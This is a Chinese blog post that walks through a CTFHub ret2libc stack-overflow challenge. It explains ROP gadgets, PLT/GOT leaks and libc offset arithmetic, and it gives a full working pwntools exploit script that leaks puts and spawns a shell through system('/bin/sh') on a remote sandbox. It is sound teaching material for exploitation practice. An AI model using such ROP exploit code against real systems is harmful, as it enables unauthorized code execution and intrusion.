【网安】pwn-ret2libc

原创 于 2026-01-21 16:19:11 发布 · 1.4k 阅读 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
cknow-ai one____dream

cknow-ai 关注

标签
#python #网络安全 #安全 #网络攻击模型
分类 信息安全与密码学

前言

先解释一下ROP和ret2libc的区别:ROP是一种攻击技术框架,而ret2libc是ROP框架下最经典的一种具体应用

也可以理解为ROP(面向返回编程)是一种思想,即先利用某种手段将实际运行时的关键信息泄露给攻击者,攻击者再利用这个泄露出来的信息进行攻击,获取更机密的信息

而ret2libc就是ROP的一种具体应用,即专门利用libc库中的危险函数(如system)进行攻击,通常以调用system('/bin/sh')获取shell为直接目标

ret2libc可看作ret2text的增强版,即无法从二进制文件中直接得到system函数的地址时,转而从libc文件中获取,这种方法可以用来绕过NX防护措施

如果认为本文理解有难度,可先看我的另一篇关于ret2text的博客,链接:【网安】pwn-ret2text-CSDN博客

题目描述

本文以CTFHub技能树中的题目为例(pwn-栈溢出-ROP)

题目给了一个远程攻击的服务器域名和端口号,附件中是一个pwn二进制文件,一个libc文件,如下图

WriteUp

ret2libc的题目仍然遵循pwn题目的套路,我们先用IDA反汇编器打开二进制文件,看看能不能找到有用的信息

继续按F5键反编译为伪C语言

main函数很简单,输出了一句提示信息之后就进入vuln函数,很显然vuln就是攻击的重点,我们来看一眼

这是一个很明显的栈溢出,因为buf只有64字节而可以读入0x200个字节,再加上题目的附件中还提供了libc文件,因此可判断这是一道ret2libc的题目,下面的思路就很清晰了:

(1)寻找二进制程序运行中有没有调用puts,printf,read等libc文件中的系统函数,本题以puts函数为例,找到其 plt 和   got 地址

(2)找到pop rdi ;ret地址和main函数地址,用于构造payload,并在泄露puts函数地址后进行第二次攻击

(3)利用上述4个地址和栈结构构造第一次攻击payload,目的是泄露puts函数地址让攻击者接收

(4)利用泄露出的puts函数地址计算出libc的基址,进一步可算出system和bin/sh的地址,就能构造第二次攻击payload,获取system shell

下面详细演示这4个步骤

1 寻找系统函数的 plt 和 got 地址

对于系统函数的选择笔者没有多想,看到main函数中正好有puts就直接用了,如下图

然后用Linux的GDB调试工具获取 plt 和 got 地址

反汇编main函数,得到puts的 plt 地址

反汇编puts函数,得到puts的 got 地址

2 获取pop rdi ;ret地址和main函数地址

main函数地址就是上面反汇编main函数时的第一条指令地址,即0x00000000004005d8,而pop rdi ; ret指令地址需要用到ROPgadget工具获取,我们取最后一行的指令地址

3 构造第一次攻击payload

有了上面准备的4个地址,我们就可以构造payload了,形式如下:

下面解释一下为什么payload长这个样子:

1.cyclic是为了用无效数据覆盖掉缓冲区buf和EBP,这部分不清楚的可以看我的另一篇博客【网安】pwn-ret2text-CSDN博客

2.pop_rdi_ret用来覆盖原返回地址,这样当vuln函数返回时就不会返回到main函数,而是转向执行pop rdi ; ret指令,下面的设计也与这两条指令有关

3.程序现在执行pop rdi指令

要先知道在64位Linux中,调用 puts的第一个参数(要打印的地址)必须放在 rdi 寄存器中

因此这里写puts的got地址,就能通过pop指令将puts_got写入rdi,作为puts的参数,进而打印出puts函数的实际运行地址

(这里还有个细节:puts_got其实是got表项地址,这个地址里存的内容才是puts函数的实际运行地址)

4.程序现在执行ret指令

ret指令的含义是从栈顶取出地址并跳转,而此时的栈顶就是puts的plt地址(调用地址),这样就成功调用了puts函数并打印出puts的实际运行地址

5.第四步中调用puts函数时,puts函数内部还有一个ret,这个ret会取出当前栈顶main_addr并跳转,这样就回到了main函数,可进行第二次攻击

4 构造第二次攻击payload

在构造第二次payload之前需要先利用第一次攻击得到的puts函数实际运行地址来计算出system函数和bin/sh的实际运行地址,具体算法:

1.puts函数实际运行地址-puts函数固定偏移=libc基址

2.

libc基址+system函数偏移=system函数实际运行地址

libc基址+bin/sh偏移=bin/sh实际运行地址

代码如下

libc=ELF('./libc-2.27.so')
#libc中偏移地址
offset_system=libc.symbols['system']
offset_puts=libc.symbols['puts']
offset_binsh=next(libc.search(b'/bin/sh\x00'))
#实际运行地址
libc_addr=leaked_puts-offset_puts#libc基址
system_addr=libc_addr+offset_system
binsh_addr=libc_addr+offset_binsh

之后就可以构造payload了,形式如下

offset=72
payload = flat([
    cyclic(offset),
    pop_rdi_ret,
    binsh_addr,
    ret_addr,
    system_addr
])

这部分构造逻辑与第一次payload相同,binsh当system函数的参数,相当于调用的是system("/bin/sh")

5 完整代码及攻击效果

完整代码

from pwn import *

context(os='linux', arch='amd64')

libc=ELF('./libc-2.27.so')
io=remote('challenge-341f38487050e016.sandbox.ctfhub.com',39302)

#libc中偏移地址
offset_system=libc.symbols['system']
offset_puts=libc.symbols['puts']
offset_binsh=next(libc.search(b'/bin/sh\x00'))

#第一次攻击
#puts plt,got等地址
pop_rdi_ret=0x0000000000400683
puts_plt = 0x4004a0     # puts@plt——调用puts函数的地址
puts_got = 0x601018     # puts@got.plt——puts函数的实地址
main_addr = 0x00000000004005d8    # 返回main函数,以便进行第二次攻击
#构造payload
offset=72
payload = flat([
    cyclic(offset),
    pop_rdi_ret,   # 1. 控制rdi寄存器
    puts_got,      # 2. 参数:要泄露的地址(puts的GOT表项)
    puts_plt,      # 3. 调用puts(puts_got)打印地址
    main_addr      # 4. 返回main函数,准备第二次攻击(puts的ret指令,从栈顶取出地址跳转)
])
io.recvuntil(b'someting:\n')
io.send(payload)
io.recvline()
# 接收输出(这里可能需要根据具体情况调整)
leaked_puts = u64(io.recv(6).ljust(8, b'\x00'))#接收6个字节的地址,再用\x00填充至8字节,最后用u64解析

#第二次攻击
libc_addr=leaked_puts-offset_puts
system_addr=libc_addr+offset_system
binsh_addr=libc_addr+offset_binsh
ret_addr=0x000000000040048e

offset=72
payload = flat([
    cyclic(offset),
    pop_rdi_ret,
    binsh_addr,
    ret_addr,
    system_addr
])
io.recvuntil(b'someting:\n')
io.send(payload)
io.interactive()

攻击效果

可以看到,运行攻击脚本后成功获取到了system shell,并从中获取了flag为ctfhub{729ec7a548f2e3d10d66b22e}

避坑

主体思路已经阐述明白了,但在实现过程中还是遇到了几个坑,在此记录一下:

(1)在程序的开头需要加上 context(os='linux', arch='amd64') 以说明操作系统和架构,这在64位Linux环境下是必要的

(2)

在64位系统中,调用 system 时需要保证栈是 16字节对齐 的。当 system 被调用时,如果 (rsp % 16) != 0,可能会崩溃。

解决方案:在 system 地址前加一个 ret 指令来调整栈对齐

代码如下

payload = flat([
    cyclic(offset),
    pop_rdi_ret,
    binsh_addr,
    ret_addr,#ret指令调整栈对齐
    system_addr
])

至于ret_addr,仍可通过ROPgadget工具获取ret指令的地址

点赞 点赞 40
评论 0
书签 书签 17
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8888
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2libc类型题目思考-ret2libc1
qq_30528603的博客
05-29 383
一眼看到栈溢出,ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址,这是要分清楚的。关于plt表和got表参考我的其他博客,这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h,就算换算成10进制在加4也是104,当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候,他将跳到system函数的地址去执行,此时他将把ebp+4的内容当做函数的第一个参数传递。
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 2万+
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
Ret2libc
钞sir的博客
01-26 9578
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ret2libc
最新发布
m0_62280492的博客
09-03 1645
ret2libc
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1894
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
PWN · ret2libcret2libc1
Mr_Fmnwon的博客
05-08 2429
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2989
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
PWN学习之ret2libc
07-23 1205
栈溢出其实就是指程序向变量中写入了超过自身实际大小的内容造成改变栈中相邻变量的值的情况。实现栈溢出要保证两个基本条件第一要程序必须向栈 上写入数据第二程序并未对输入内容的大小进行控制。ret2.. .是什么意思?在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自已想要执行的代码。ret2. ..代表返回到. ..中即控制函数的返回地址到预先设定好的...区域中去执行...代码。ret2shellcode其主要思想就是控制返回地址使其指向shellcode所在的区域。
pwn ret2libc
清霂的博客
02-04 670
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libc。 libc.so是一个函数库(类似于C语言#include<iostream>的iostrea
pwn学习之ret2libc
weixin_43800829的博客
02-16 1524
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
pwn学习笔记(4)ret2libc
qq_66013948的博客
02-19 1754
​ 静态链接是由链接器在链接时将库的内容加入到可执行程序中的做法。链接器是一个独立程序,将一个或多个库或目标文件(先前由编译器或汇编器生成)链接到一块生成可执行程序。这里的库指的是静态链接库,Windows下以.lib为后缀,Linux下以.a为后缀。​ 也就是说将静态链接库中的所有的函数都写入这个ELF文件中,所以会造成该二进制文件极为庞大,因此也会存在很多的可供利用来ret2syscall的gadgets。但是,使用静态链接生成的可执行文件体积较大,包含相同的公共代码,造成浪费。
pwn基本ROP——ret2libc
turtlesd的博客
04-26 3559
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 6332
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1351
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
PWN · ret2libcret2libc2
Mr_Fmnwon的博客
05-08 1319
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
Pwn学习-ret2libc三联
cdl10000的博客
11-05 596
正常请求ebp要ret至main函数,因此把此间的变量覆盖成其他的函数地址。此处调试过程需要注意,输入的位置是gets函数,要继续调试至main函数再查看stack,计算此时的偏移量,偏移量为112。此题目与上一题最大的区别就是没有/bin/sh,那么结合攻击思路,需要写一个/bin/sh进去执行。调试过程中有坑,需要一个地址能够写进程序,使用IDA调试,发现buf2函数可以写入。继续跟进调试,直至ret至下个main函数,再查看stack。思路一样,减少找函数的过程,提升解题效率。
PWN · ret2libc】[NISACTF 2022]ezstack
Mr_Fmnwon的博客
05-27 1832
通过查看ELF文件信息,确定攻击方法,实现ret2libc1类型的攻击简单的ret2libc1类型题目。
PWN题型之Ret2Libc
swedsn
03-18 6718
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
”BUUCTF之pwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 2万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值